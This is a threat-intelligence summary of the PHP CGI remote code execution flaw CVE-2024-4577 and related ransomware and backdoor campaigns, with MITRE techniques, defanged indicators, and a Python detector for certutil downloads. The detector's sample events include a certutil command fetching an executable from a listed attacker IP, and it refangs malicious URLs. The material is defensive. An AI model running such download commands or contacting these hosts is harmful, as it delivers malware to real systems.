DEVCORE reports a critical remote code execution flaw in PHP (CVE-2024-4577) affecting all PHP versions from 5.x onward running in CGI mode on Windows, arising from mishandled character encoding conversions. Bitdefender notes ties to the TellYouThePass ransomware operations, while observed campaigns show post-exploitation activity such as PowerShell usage, DLL side-loading, and various C2 activities. #TellYouThePass #PowerShell #GoBackdoor #RustTrojan #CobaltStrike #RingQ #CVE-2024-4577
Keypoints
- CVE-2024-4577 is a critical PHP RCE affecting all PHP versions from 5.x onward on Windows CGI.
- The vulnerability stems from mishandled character encoding conversions, particularly the Windows Best-Fit behavior, enabling command execution via simple web requests.
- Public exposure and exploitation surged after disclosure, with hundreds of thousands of potentially vulnerable instances detected by Shodan and Censys data.
- Post-exploitation activity includes disabling security controls, deploying additional malware, credential capture, and remote command-and-control across multiple servers.
- Campaigns have leveraged various toolsets (PowerShell, RingQ, CobaltStrike, Go-based backdoors) and multiple download/loader techniques.
- Mitigations emphasize updating PHP to patched versions, evaluating non-CGI architectures, asset inventory, and interim network/file-based hardening actions.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to trigger RCE via PHP CGI; “attackers can force servers to execute unwanted commands via simple web request.”
- [T1059.003] Windows Command Shell – Attackers used scripts within cmd.exe to download additional malware via certutil.exe; “scripts within cmd.exe to download additional malware via certutil.exe from hxxp://147[.]50[.]253[.]109:35411.”
- [T1055] Process Injection – Sideloaded DLLs injected malicious code into processes on affected systems, enabling credential capture and remote command-and-control (C2).
- [T1105] Ingress Tool Transfer – Downloaded additional malware from remote URLs to expand foothold; “download additional malware via certutil.exe from …”
- [T1071.001] Web Protocols – C2 communications and data exfiltration via networked backdoors; “C2 server” communications observed in campaigns.
- [T1003] OS Credential Dumping – Credential capture described as part of post-exploitation activities.
- [T1036] Masquerading – Varied naming conventions for batch, DLL, and EXE files with intentional typos to resemble legitimate system files.
Indicators of Compromise
- [IP Address] External scanning IPs – 79.124.49[.]158, 88.218.76[.]13, and other known scanning addresses (e.g., 104.238.183[.]19, 103.142.147[.]47, 146[.]19[.]100[.]7)
- [Hash] File hash – 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3, 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618, and 2 more hashes
- [Domain] Domains – ne.phpbug[.]xyz, cl.php-cgi[.]com/idna, and www[.]eqwedasda[.]xyz
- [URL] Malicious download URLs – hxxp[://]147[.]50[.]253[.]109:35411, hxxp[:]//xss-1253555722[.]cos[.]ap-singapore[.]myqcloud[.]com/win.exe
- [Hash] Additional malware/droppers – 976c81f847ef5d7277abba26f4c2a5811dfd4569ef7ecd2df3f67414331e3e19, b6a77e293a158f046f39ab50f276ef9f
- [URL] Other download sites – hxxp[://]dpp-s3-data[.]s3[.]amazonaws[.]com/tpPNDWqMh5ubw, hxxp[://]buddha-common[.]s3[.]amazonaws[.]com/ybe3cjgot6x2x, hxxp[://]alien-static[.]s3[.]amazonaws[.]com/djwne6au4b0u0
- [Domain] Additional domains – xss-1253555722[.]cos[.]ap-singapore[.]myqcloud[.]com (win.exe), etc.
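The T1059.003/T1105 behaviour above (cmd.exe running certutil.exe to fetch a payload) and the download URLs in the IoC list can be turned into a simple process-event check. The following Python is an added example, not code from the report or from any of the vendors named; the process events are constructed, and only the three defanged URLs are taken from the IoC list.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Download URLs taken from the report's IoC list (defanged as published);
# they are refanged below so command lines can be matched against them.
DEFANGED_URLS = [
    "hxxp[://]147[.]50[.]253[.]109:35411",
    "hxxp[:]//xss-1253555722[.]cos[.]ap-singapore[.]myqcloud[.]com/win.exe",
    "hxxp[://]dpp-s3-data[.]s3[.]amazonaws[.]com/tpPNDWqMh5ubw",
]

def refang(value: str) -> str:
    """Reverse the hxxp / [.] / [://] defanging used in the report."""
    return (value.replace("hxxp", "http").replace("[://]", "://")
            .replace("[:]//", "://").replace("[.]", "."))

IOC_HOSTS = {urlparse(refang(u)).hostname for u in DEFANGED_URLS}

# certutil fetches a remote file with -urlcache (usually with -split -f);
# any URL following that switch on the command line deserves a closer look.
CERTUTIL_DL = re.compile(r"certutil(?:\.exe)?\b.*-urlcache.*?\s(https?://\S+)", re.I)

def analyze(parent: str, cmdline: str) -> Optional[dict]:
    """Return a finding for a certutil download, or None for anything else."""
    m = CERTUTIL_DL.search(cmdline)
    if not m:
        return None
    url = m.group(1)
    return {
        "url": url,
        "spawned_by_cmd": parent.lower().endswith("cmd.exe"),  # T1059.003
        "known_ioc": urlparse(url).hostname in IOC_HOSTS,      # T1105 + IoC hit
    }

# Constructed (parent process, command line) pairs standing in for EDR process events.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe",
     "certutil.exe -urlcache -split -f http://147.50.253.109:35411/a.exe a.exe"),
    ("C:\\Windows\\explorer.exe",
     "certutil -URLCache -f http://updates.example.test/tool.zip tool.zip"),
    ("C:\\Windows\\System32\\cmd.exe",
     "certutil -hashfile C:\\Temp\\a.exe SHA256"),
]

def findings(events):
    return [dict(cmdline=c, **a) for p, c in events if (a := analyze(p, c))]

if __name__ == "__main__":
    for f in findings(SAMPLE_EVENTS):
        print(f)
```

A download from an unlisted host is still reported (certutil fetching from the web is rare in normal administration); the known_ioc flag only raises the priority when the host matches the report's list.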